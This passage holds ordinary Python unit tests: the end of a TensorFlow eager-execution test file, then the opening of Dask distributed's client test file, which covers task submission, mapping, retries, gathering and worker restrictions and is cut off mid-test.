with self.assertRaises(TypeError):
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(str)
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertEqual(15, product.numpy())
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
# That should be okay.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3), constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertEqual(15, product.numpy())
def testMatMulGPU(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
three = constant_op.constant([[3.]]).as_gpu_tensor()
five = constant_op.constant([[5.]]).as_gpu_tensor()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertEqual([[15.0]], product.numpy())
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal.numpy())
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertEqual(7, total.numpy())
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3]]),
constant_op.constant([[5]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertEqual([[15]], product.numpy())
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', 1, 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b.numpy())
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b.numpy())
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1.numpy())
self.assertAllEqual([[1], [4]], x2.numpy())
self.assertAllEqual([[2], [5]], x3.numpy())
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEquals(dtypes.int32, three_x.dtype)
self.assertEquals(3, three_x.numpy())
def testOperationWithNoInputsRunsOnDevice(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).as_gpu_tensor()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
if __name__ == '__main__':
test.main()
|
test_client.py
|
import asyncio
from collections import deque
from contextlib import suppress
from functools import partial
import gc
import logging
from operator import add
import os
import pickle
import psutil
import random
import subprocess
import sys
import threading
from threading import Semaphore
from time import sleep
import traceback
import warnings
import weakref
import zipfile
import pytest
from tlz import identity, isdistinct, concat, pluck, valmap, first, merge
import dask
from dask import delayed
from dask.optimization import SubgraphCallable
import dask.bag as db
from distributed import (
Worker,
Nanny,
fire_and_forget,
LocalCluster,
get_client,
secede,
get_worker,
Executor,
profile,
performance_report,
TimeoutError,
CancelledError,
)
from distributed.comm import CommClosedError
from distributed.client import (
Client,
Future,
wait,
as_completed,
tokenize,
_get_global_client,
default_client,
futures_of,
temp_default_client,
)
from distributed.compatibility import WINDOWS
from distributed.metrics import time
from distributed.scheduler import Scheduler, KilledWorker
from distributed.sizeof import sizeof
from distributed.utils import (
mp_context,
sync,
tmp_text,
tokey,
tmpfile,
is_valid_xml,
)
from distributed.utils_test import (
cluster,
slowinc,
slowadd,
slowdec,
randominc,
inc,
dec,
div,
throws,
geninc,
asyncinc,
gen_cluster,
gen_test,
double,
popen,
captured_logger,
varying,
map_varying,
wait_for,
async_wait_for,
pristine_loop,
save_sys_modules,
)
from distributed.utils_test import ( # noqa: F401
client as c,
client_secondary as c2,
cleanup,
cluster_fixture,
loop,
loop_in_thread,
nodebug,
s,
a,
b,
)
@gen_cluster(client=True, timeout=None)
async def test_submit(c, s, a, b):
x = c.submit(inc, 10)
assert not x.done()
assert isinstance(x, Future)
assert x.client is c
result = await x
assert result == 11
assert x.done()
y = c.submit(inc, 20)
z = c.submit(add, x, y)
result = await z
assert result == 11 + 21
s.validate_state()
@gen_cluster(client=True)
async def test_map(c, s, a, b):
L1 = c.map(inc, range(5))
assert len(L1) == 5
assert isdistinct(x.key for x in L1)
assert all(isinstance(x, Future) for x in L1)
result = await L1[0]
assert result == inc(0)
assert len(s.tasks) == 5
L2 = c.map(inc, L1)
result = await L2[1]
assert result == inc(inc(1))
assert len(s.tasks) == 10
# assert L1[0].key in s.tasks[L2[0].key]
total = c.submit(sum, L2)
result = await total
assert result == sum(map(inc, map(inc, range(5))))
L3 = c.map(add, L1, L2)
result = await L3[1]
assert result == inc(1) + inc(inc(1))
L4 = c.map(add, range(3), range(4))
results = await c.gather(L4)
assert results == list(map(add, range(3), range(4)))
def f(x, y=10):
return x + y
L5 = c.map(f, range(5), y=5)
results = await c.gather(L5)
assert results == list(range(5, 10))
y = c.submit(f, 10)
L6 = c.map(f, range(5), y=y)
results = await c.gather(L6)
assert results == list(range(20, 25))
s.validate_state()
@gen_cluster(client=True)
async def test_map_empty(c, s, a, b):
L1 = c.map(inc, [], pure=False)
assert len(L1) == 0
results = await c.gather(L1)
assert results == []
@gen_cluster(client=True)
async def test_map_keynames(c, s, a, b):
futures = c.map(inc, range(4), key="INC")
assert all(f.key.startswith("INC") for f in futures)
assert isdistinct(f.key for f in futures)
futures2 = c.map(inc, [5, 6, 7, 8], key="INC")
assert [f.key for f in futures] != [f.key for f in futures2]
keys = ["inc-1", "inc-2", "inc-3", "inc-4"]
futures = c.map(inc, range(4), key=keys)
assert [f.key for f in futures] == keys
@gen_cluster(client=True)
async def test_map_retries(c, s, a, b):
args = [
[ZeroDivisionError("one"), 2, 3],
[4, 5, 6],
[ZeroDivisionError("seven"), ZeroDivisionError("eight"), 9],
]
x, y, z = c.map(*map_varying(args), retries=2)
assert await x == 2
assert await y == 4
assert await z == 9
x, y, z = c.map(*map_varying(args), retries=1, pure=False)
assert await x == 2
assert await y == 4
with pytest.raises(ZeroDivisionError, match="eight"):
await z
x, y, z = c.map(*map_varying(args), retries=0, pure=False)
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 4
with pytest.raises(ZeroDivisionError, match="seven"):
await z
@gen_cluster(client=True)
async def test_map_batch_size(c, s, a, b):
result = c.map(inc, range(100), batch_size=10)
result = await c.gather(result)
assert result == list(range(1, 101))
result = c.map(add, range(100), range(100), batch_size=10)
result = await c.gather(result)
assert result == list(range(0, 200, 2))
# mismatch shape
result = c.map(add, range(100, 200), range(10), batch_size=2)
result = await c.gather(result)
assert result == list(range(100, 120, 2))
@gen_cluster(client=True)
async def test_compute_retries(c, s, a, b):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
# Sanity check for varying() use
x = c.compute(delayed(varying(args))())
with pytest.raises(ZeroDivisionError, match="one"):
await x
# Same retries for all
x = c.compute(delayed(varying(args))(), retries=1)
with pytest.raises(ZeroDivisionError, match="two"):
await x
x = c.compute(delayed(varying(args))(), retries=2)
assert await x == 3
args.append(4)
x = c.compute(delayed(varying(args))(), retries=2)
assert await x == 3
# Per-future retries
xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
zargs = [80, 90, 100]
x, y = [delayed(varying(args))() for args in (xargs, yargs)]
x, y = c.compute([x, y], retries={x: 2})
gc.collect()
assert await x == 30
with pytest.raises(ZeroDivisionError, match="five"):
await y
x, y, z = [delayed(varying(args))() for args in (xargs, yargs, zargs)]
x, y, z = c.compute([x, y, z], retries={(y, z): 2})
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 70
assert await z == 80
def test_retries_get(c):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = delayed(varying(args))()
assert x.compute(retries=5) == 3
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = delayed(varying(args))()
with pytest.raises(ZeroDivisionError):
x.compute()
@gen_cluster(client=True)
async def test_compute_persisted_retries(c, s, a, b):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
# Sanity check
x = c.persist(delayed(varying(args))())
fut = c.compute(x)
with pytest.raises(ZeroDivisionError, match="one"):
await fut
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=1)
with pytest.raises(ZeroDivisionError, match="two"):
await fut
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=2)
assert await fut == 3
args.append(4)
x = c.persist(delayed(varying(args))())
fut = c.compute(x, retries=3)
assert await fut == 3
@gen_cluster(client=True)
async def test_persist_retries(c, s, a, b):
# Same retries for all
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = c.persist(delayed(varying(args))(), retries=1)
x = c.compute(x)
with pytest.raises(ZeroDivisionError, match="two"):
await x
x = c.persist(delayed(varying(args))(), retries=2)
x = c.compute(x)
assert await x == 3
# Per-key retries
xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
zargs = [80, 90, 100]
x, y, z = [delayed(varying(args))() for args in (xargs, yargs, zargs)]
x, y, z = c.persist([x, y, z], retries={(y, z): 2})
x, y, z = c.compute([x, y, z])
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 70
assert await z == 80
@gen_cluster(client=True)
async def test_retries_dask_array(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((10, 10), chunks=(3, 3))
future = c.compute(x.sum(), retries=2)
y = await future
assert y == 100
@gen_cluster(client=True)
async def test_future_repr(c, s, a, b):
pd = pytest.importorskip("pandas")
x = c.submit(inc, 10)
y = c.submit(pd.DataFrame, {"x": [1, 2, 3]})
await x
await y
for func in [repr, lambda x: x._repr_html_()]:
assert str(x.key) in func(x)
assert str(x.status) in func(x)
assert str(x.status) in repr(c.futures[x.key])
assert "int" in func(x)
assert "pandas" in func(y)
assert "DataFrame" in func(y)
@gen_cluster(client=True)
async def test_future_tuple_repr(c, s, a, b):
da = pytest.importorskip("dask.array")
y = da.arange(10, chunks=(5,)).persist()
f = futures_of(y)[0]
for func in [repr, lambda x: x._repr_html_()]:
for k in f.key:
assert str(k) in func(f)
@gen_cluster(client=True)
async def test_Future_exception(c, s, a, b):
x = c.submit(div, 1, 0)
result = await x.exception()
assert isinstance(result, ZeroDivisionError)
x = c.submit(div, 1, 1)
result = await x.exception()
assert result is None
def test_Future_exception_sync(c):
x = c.submit(div, 1, 0)
assert isinstance(x.exception(), ZeroDivisionError)
x = c.submit(div, 1, 1)
assert x.exception() is None
@gen_cluster(client=True)
async def test_Future_release(c, s, a, b):
# Released Futures should be removed timely from the Client
x = c.submit(div, 1, 1)
await x
x.release()
await asyncio.sleep(0)
assert not c.futures
x = c.submit(slowinc, 1, delay=0.5)
x.release()
await asyncio.sleep(0)
assert not c.futures
x = c.submit(div, 1, 0)
await x.exception()
x.release()
await asyncio.sleep(0)
assert not c.futures
def test_Future_release_sync(c):
# Released Futures should be removed timely from the Client
x = c.submit(div, 1, 1)
x.result()
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
x = c.submit(slowinc, 1, delay=0.8)
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
x = c.submit(div, 1, 0)
x.exception()
x.release()
wait_for(lambda: not c.futures, timeout=0.3)
def test_short_tracebacks(loop, c):
tblib = pytest.importorskip("tblib")
future = c.submit(div, 1, 0)
try:
future.result()
except Exception:
_, _, tb = sys.exc_info()
tb = tblib.Traceback(tb).to_dict()
n = 0
while tb is not None:
n += 1
tb = tb["tb_next"]
assert n < 5
@gen_cluster(client=True)
async def test_map_naming(c, s, a, b):
L1 = c.map(inc, range(5))
L2 = c.map(inc, range(5))
assert [x.key for x in L1] == [x.key for x in L2]
L3 = c.map(inc, [1, 1, 1, 1])
assert len({x._state for x in L3}) == 1
L4 = c.map(inc, [1, 1, 1, 1], pure=False)
assert len({x._state for x in L4}) == 4
@gen_cluster(client=True)
async def test_submit_naming(c, s, a, b):
a = c.submit(inc, 1)
b = c.submit(inc, 1)
assert a._state is b._state
c = c.submit(inc, 1, pure=False)
assert c.key != a.key
@gen_cluster(client=True)
async def test_exceptions(c, s, a, b):
x = c.submit(div, 1, 2)
result = await x
assert result == 1 / 2
x = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
await x
x = c.submit(div, 10, 2) # continues to operate
result = await x
assert result == 10 / 2
@gen_cluster()
async def test_gc(s, a, b):
c = await Client(s.address, asynchronous=True)
x = c.submit(inc, 10)
await x
assert s.tasks[x.key].who_has
x.__del__()
await async_wait_for(
lambda: x.key not in s.tasks or not s.tasks[x.key].who_has, timeout=0.3
)
await c.close()
def test_thread(c):
x = c.submit(inc, 1)
assert x.result() == 2
x = c.submit(slowinc, 1, delay=0.3)
with pytest.raises(TimeoutError):
x.result(timeout=0.01)
assert x.result() == 2
def test_sync_exceptions(c):
x = c.submit(div, 10, 2)
assert x.result() == 5
y = c.submit(div, 10, 0)
try:
y.result()
assert False
except ZeroDivisionError:
pass
z = c.submit(div, 10, 5)
assert z.result() == 2
@gen_cluster(client=True)
async def test_gather(c, s, a, b):
x = c.submit(inc, 10)
y = c.submit(inc, x)
result = await c.gather(x)
assert result == 11
result = await c.gather([x])
assert result == [11]
result = await c.gather({"x": x, "y": [y]})
assert result == {"x": 11, "y": [12]}
@gen_cluster(client=True)
async def test_gather_lost(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
y = c.submit(inc, 1, workers=b.address)
await a.close()
with pytest.raises(Exception):
await c.gather([x, y])
def test_gather_sync(c):
x = c.submit(inc, 1)
assert c.gather(x) == 2
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
c.gather([x, y])
[xx] = c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True)
async def test_gather_strict(c, s, a, b):
x = c.submit(div, 2, 1)
y = c.submit(div, 1, 0)
with pytest.raises(ZeroDivisionError):
await c.gather([x, y])
[xx] = await c.gather([x, y], errors="skip")
assert xx == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
async def test_gather_skip(c, s, a):
x = c.submit(div, 1, 0, priority=10)
y = c.submit(slowinc, 1, delay=0.5)
with captured_logger(logging.getLogger("distributed.scheduler")) as sched:
with captured_logger(logging.getLogger("distributed.client")) as client:
L = await c.gather([x, y], errors="skip")
assert L == [2]
assert not client.getvalue()
assert not sched.getvalue()
@gen_cluster(client=True)
async def test_limit_concurrent_gathering(c, s, a, b):
futures = c.map(inc, range(100))
await c.gather(futures)
assert len(a.outgoing_transfer_log) + len(b.outgoing_transfer_log) < 100
@gen_cluster(client=True, timeout=None)
async def test_get(c, s, a, b):
future = c.get({"x": (inc, 1)}, "x", sync=False)
assert isinstance(future, Future)
result = await future
assert result == 2
futures = c.get({"x": (inc, 1)}, ["x"], sync=False)
assert isinstance(futures[0], Future)
result = await c.gather(futures)
assert result == [2]
futures = c.get({}, [], sync=False)
result = await c.gather(futures)
assert result == []
result = await c.get(
{("x", 1): (inc, 1), ("x", 2): (inc, ("x", 1))}, ("x", 2), sync=False
)
assert result == 3
def test_get_sync(c):
assert c.get({"x": (inc, 1)}, "x") == 2
def test_no_future_references(c):
from weakref import WeakSet
ws = WeakSet()
futures = c.map(inc, range(10))
ws.update(futures)
del futures
import gc
gc.collect()
start = time()
while list(ws):
sleep(0.01)
assert time() < start + 2
def test_get_sync_optimize_graph_passes_through(c):
bag = db.range(10, npartitions=3).map(inc)
dask.compute(bag.sum(), optimize_graph=False)
@gen_cluster(client=True)
async def test_gather_errors(c, s, a, b):
def f(a, b):
raise TypeError
def g(a, b):
raise AttributeError
future_f = c.submit(f, 1, 2)
future_g = c.submit(g, 1, 2)
with pytest.raises(TypeError):
await c.gather(future_f)
with pytest.raises(AttributeError):
await c.gather(future_g)
await a.close()
@gen_cluster(client=True)
async def test_wait(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
z = c.submit(inc, 2)
done, not_done = await wait([x, y, z])
assert done == {x, y, z}
assert not_done == set()
assert x.status == y.status == "finished"
@gen_cluster(client=True)
async def test_wait_first_completed(c, s, a, b):
x = c.submit(slowinc, 1)
y = c.submit(slowinc, 1)
z = c.submit(inc, 2)
done, not_done = await wait([x, y, z], return_when="FIRST_COMPLETED")
assert done == {z}
assert not_done == {x, y}
assert z.status == "finished"
assert x.status == "pending"
assert y.status == "pending"
@gen_cluster(client=True, timeout=2)
async def test_wait_timeout(c, s, a, b):
future = c.submit(sleep, 0.3)
with pytest.raises(TimeoutError):
await wait(future, timeout=0.01)
def test_wait_sync(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
done, not_done = wait([x, y])
assert done == {x, y}
assert not_done == set()
assert x.status == y.status == "finished"
future = c.submit(sleep, 0.3)
with pytest.raises(TimeoutError):
wait(future, timeout=0.01)
def test_wait_informative_error_for_timeouts(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
try:
wait(x, y)
except Exception as e:
assert "timeout" in str(e)
assert "list" in str(e)
@gen_cluster(client=True)
async def test_garbage_collection(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
assert c.refcount[x.key] == 2
x.__del__()
await asyncio.sleep(0)
assert c.refcount[x.key] == 1
z = c.submit(inc, y)
y.__del__()
await asyncio.sleep(0)
result = await z
assert result == 3
ykey = y.key
y.__del__()
await asyncio.sleep(0)
assert ykey not in c.futures
@gen_cluster(client=True)
async def test_garbage_collection_with_scatter(c, s, a, b):
[future] = await c.scatter([1])
assert future.key in c.futures
assert future.status == "finished"
assert s.who_wants[future.key] == {c.id}
key = future.key
assert c.refcount[key] == 1
future.__del__()
await asyncio.sleep(0)
assert c.refcount[key] == 0
start = time()
while True:
if key not in s.tasks or not s.tasks[key].who_has:
break
else:
assert time() < start + 3
await asyncio.sleep(0.1)
@gen_cluster(timeout=1000, client=True)
async def test_recompute_released_key(c, s, a, b):
x = c.submit(inc, 100)
result1 = await x
xkey = x.key
del x
import gc
gc.collect()
await asyncio.sleep(0)
assert c.refcount[xkey] == 0
# 1 second batching needs a second action to trigger
while xkey in s.tasks and s.tasks[xkey].who_has or xkey in a.data or xkey in b.data:
await asyncio.sleep(0.1)
x = c.submit(inc, 100)
assert x.key in c.futures
result2 = await x
assert result1 == result2
@pytest.mark.slow
@gen_cluster(client=True)
async def test_long_tasks_dont_trigger_timeout(c, s, a, b):
from time import sleep
x = c.submit(sleep, 3)
await x
@pytest.mark.skip
@gen_cluster(client=True)
async def test_missing_data_heals(c, s, a, b):
a.validate = False
b.validate = False
x = c.submit(inc, 1)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([x, y, z])
# Secretly delete y's key
if y.key in a.data:
del a.data[y.key]
a.release_key(y.key)
if y.key in b.data:
del b.data[y.key]
b.release_key(y.key)
await asyncio.sleep(0)
w = c.submit(add, y, z)
result = await w
assert result == 3 + 4
@pytest.mark.skip
@gen_cluster(client=True)
async def test_gather_robust_to_missing_data(c, s, a, b):
a.validate = False
b.validate = False
x, y, z = c.map(inc, range(3))
await wait([x, y, z]) # everything computed
for f in [x, y]:
for w in [a, b]:
if f.key in w.data:
del w.data[f.key]
await asyncio.sleep(0)
w.release_key(f.key)
xx, yy, zz = await c.gather([x, y, z])
assert (xx, yy, zz) == (1, 2, 3)
@pytest.mark.skip
@gen_cluster(client=True)
async def test_gather_robust_to_nested_missing_data(c, s, a, b):
a.validate = False
b.validate = False
w = c.submit(inc, 1)
x = c.submit(inc, w)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([z])
for worker in [a, b]:
for datum in [y, z]:
if datum.key in worker.data:
del worker.data[datum.key]
await asyncio.sleep(0)
worker.release_key(datum.key)
result = await c.gather([z])
assert result == [inc(inc(inc(inc(1))))]
@gen_cluster(client=True)
async def test_tokenize_on_futures(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 1)
tok = tokenize(x)
assert tokenize(x) == tokenize(x)
assert tokenize(x) == tokenize(y)
c.futures[x.key].finish()
assert tok == tokenize(y)
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_submit(c, s, a, b):
x = c.submit(inc, 1, workers={a.ip})
y = c.submit(inc, x, workers={b.ip})
await wait([x, y])
assert s.host_restrictions[x.key] == {a.ip}
assert x.key in a.data
assert s.host_restrictions[y.key] == {b.ip}
assert y.key in b.data
@gen_cluster(client=True)
async def test_restrictions_ip_port(c, s, a, b):
x = c.submit(inc, 1, workers={a.address})
y = c.submit(inc, x, workers={b.address})
await wait([x, y])
assert s.worker_restrictions[x.key] == {a.address}
assert x.key in a.data
assert s.worker_restrictions[y.key] == {b.address}
assert y.key in b.data
@gen_cluster(client=True)
async def test_restrictions_ip_port_task_key(c, s, a, b):
# Create a long dependency list
tasks = [delayed(inc)(1)]
for _ in range(100):
tasks.append(delayed(add)(tasks[-1], random.choice(tasks)))
last_task = tasks[-1]
# calculate all dependency keys
all_tasks = list(last_task.__dask_graph__())
# only restrict to a single worker
workers = {d: a.address for d in all_tasks}
result = c.compute(last_task, workers=workers)
await result
# all tasks should have been calculated by the first worker
for task in tasks:
assert s.worker_restrictions[task.key] == {a.address}
# and the data should also be there
assert last_task.key in a.data
assert last_task.key not in b.data
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_map(c, s, a, b):
L = c.map(inc, range(5), workers={a.ip})
await wait(L)
assert set(a.data) == {x.key for x in L}
assert not b.data
for x in L:
assert s.host_restrictions[x.key] == {a.ip}
L = c.map(inc, [10, 11, 12], workers=[{a.ip}, {a.ip, b.ip}, {b.ip}])
await wait(L)
assert s.host_restrictions[L[0].key] == {a.ip}
assert s.host_restrictions[L[1].key] == {a.ip, b.ip}
assert s.host_restrictions[L[2].key] == {b.ip}
with pytest.raises(ValueError):
c.map(inc, [10, 11, 12], workers=[{a.ip}])
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_restrictions_get(c, s, a, b):
dsk = {"x": 1, "y": (inc, "x"), "z": (inc, "y")}
restrictions = {"y": {a.ip}, "z": {b.ip}}
futures = c.get(dsk, ["y", "z"], restrictions, sync=False)
result = await c.gather(futures)
assert result == [2, 3]
assert "y" in a.data
assert "z" in b.data
@gen_cluster(client=True)
async def dont_test_bad_restrictions_raise_exception(c, s, a, b):
z = c.submit(inc, 2, workers={"bad-address"})
try:
await z
assert False
except ValueError as e:
assert "bad-address" in str(e)
assert z.key in str(e)
@gen_cluster(client=True, timeout=None)
async def test_remove_worker(c, s, a, b):
L = c.map(inc, range(20))
await wait(L)
await b.close()
assert b.address not in s.workers
result = await c.gather(L)
assert result == list(map(inc, range(20)))
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
async def test_errors_dont_block(c, s, w):
